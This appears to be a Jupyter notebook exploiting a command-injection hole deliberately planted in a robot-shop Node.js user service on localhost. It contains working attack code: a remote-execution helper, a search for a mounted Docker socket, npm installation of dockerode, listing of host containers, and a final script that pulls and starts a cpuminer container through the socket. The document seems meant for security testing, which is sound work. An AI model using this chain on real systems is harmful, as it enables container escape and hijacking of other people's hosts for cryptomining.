# [RCE] robot-shop/rs-user

Imports some dependencies to simplify exploit development.

`requests` is packaged with CPython and offers a convenient interface for an
HTTP client.

`pwn` is a library for CTF hacking contests which provides useful functions for
any kind of vulnerability exploitation.  We specifically want to use it for its
implementation of *sh* escaping through the `sh_command_with` function.

In [1]:
import requests
import pwn

We define an `exec(str)` function to simplify the logic of executing code on the
remote machine.

The vulnerability that was manually inserted into the source code is very
obvious for testing purposes.  While a real vulnerability might not be as
obvious, the ways to exploit it should remain approximately the same.

In [2]:
def exec(command: str) -> tuple[str, str]:
    """Executes the given command on the remote machine."""
    headers = {'Content-Type': 'text/plain'}
    response = requests.post('http://localhost:8080/api/user/command-injection', headers=headers, data=command)
    body = response.json()

    if 'err' in body:
        print(body)
        raise Exception(body['err'])

    return body['stdout'], body['stderr']

We can test it works by using it to print `Hello World!` to the terminal.

In [3]:
(stdout, _) = exec("echo Hello World!")
print(stdout)

Hello World!



In a real world situation, the attacker will probably know that we are running a
*NodeJS* server from looking at the `Server` header in a typical response, or
through the source code if the application is Open Source.

We know that the microservice where the vulnerability is present is a `NodeJS`
server.

We can then check if `docker` is exposed and working:

In [4]:
for path in ['/var', '/host/var']:
    print(exec(f"find {pwn.sh_string(path)} -type f -name docker.sock"))

('', '')
('/host/var/run/docker.sock\n', '')


Since we know that the container is an Alpine Linux environment, the Docker
executable will not work correctly as it requires *glibc*, which is not
installed.

In [5]:
try:
    print(exec("/host/usr/bin/docker info"))
except Exception as e:
    print(e)

{'err': {'killed': False, 'code': 1, 'signal': None, 'cmd': 'sh -c /host/usr/bin/docker info'}, 'stdout': '', 'stderr': "/host/usr/bin/docker: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by /host/usr/bin/docker)\n/host/usr/bin/docker: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /host/usr/bin/docker)\n"}
{'killed': False, 'code': 1, 'signal': None, 'cmd': 'sh -c /host/usr/bin/docker info'}


We do however have access to *NodeJS*, and could therefore use a *NodeJS*
implementation of a *Docker* client library.

In [6]:
(stdout, _) = exec("npm install dockerode")
print(stdout)

+ dockerode@3.3.4
updated 1 package and audited 208 packages in 3.149s

9 packages are looking for funding
  run `npm fund` for details

found 1 high severity vulnerability
  run `npm audit fix` to fix them, or `npm audit` for details



We can then confirm that we are able to issue queries and commands to *Docker*
from inside *NodeJS*:

In [7]:
def exec_node(script: str) -> tuple[str, str]:
    """Executes a NodeJS script on the target machine."""
    command = pwn.sh_command_with(lambda script: f"echo {script} | node --experimental-repl-await", script)
    return exec(command)

In [8]:
%%writefile docker-list-containers.js
const Docker = require('dockerode')
const docker = new Docker({ socketPath: '/host/var/run/docker.sock' })

docker.listContainers()
    .then(function (containers) {
        for (container of containers) {
            console.log(container.Id)
        }
    })
    .catch(console.error)

Overwriting docker-list-containers.js


In [9]:
with open('./docker-list-containers.js') as file:
    script = file.read()

(stdout, _) = exec_node(script)
print(stdout)

a8a04e5e5536c38133b85b468e597cd4626b2a132d1d023b41416f29bab4b2ad
c3152282acb5e4372158c010cc9ca6301bf1068aee21b6128b470569c2eef5f0
e05a4b7fadd26fbfde87c48e3fc0f438bca60b09bf9f79cb45f662a92b183bcd
06df2219099ade1b489ffbc97df6019cd715225d467251ecdd8e7960fb4d97f9
5a33dfe7b8421396ea5766e00eac954c6bceb003f99f93d9b80fdb5f49dce165
e0f2d154be195005d03924a4d22e6e088bfda451c2ef0ec5ba58a0e2bec312e8
fb246ee581c8029be63160d0ce063b60907494030907c2c8bfc7bee105e2816e
5f6591b01291d8398b3f2e1d03e571f3c454fe88758e4ed98125709e10d95118
118f3715857251e7890f0360548fb10e3dcb23287f1e206bd3f602f34a3b4da1
74ef1fe9750af9938d73a11d52648330ae6a9a4c87c8e18e02b8fbebd8df24c4
a5a3aba3f8fbfa450f23f452b6dcc33dcc8c65ce93f4ba04cd2a40262ed05855
0444bda21bb21ad671acea584de2914e9587181a0b535bf0234c598fb8fbbb70



Since we know we can query *Docker* through *NodeJS*, lets now create an image
of *cpuminer*:

In [10]:
%%writefile docker-create-cpuminer.js
const Docker = require('dockerode')
const docker = new Docker({ socketPath: '/host/var/run/docker.sock' })

;(async function () {
    await docker.pull('wernight/cpuminer-multi')   
    const container = await docker.createContainer({Image: 'wernight/cpuminer-multi:latest'})
    await container.start()
}()).catch(console.error)

Overwriting docker-create-cpuminer.js


In [11]:
with open("./docker-create-cpuminer.js") as file:
    script = file.read()

exec_node(script)

('', '')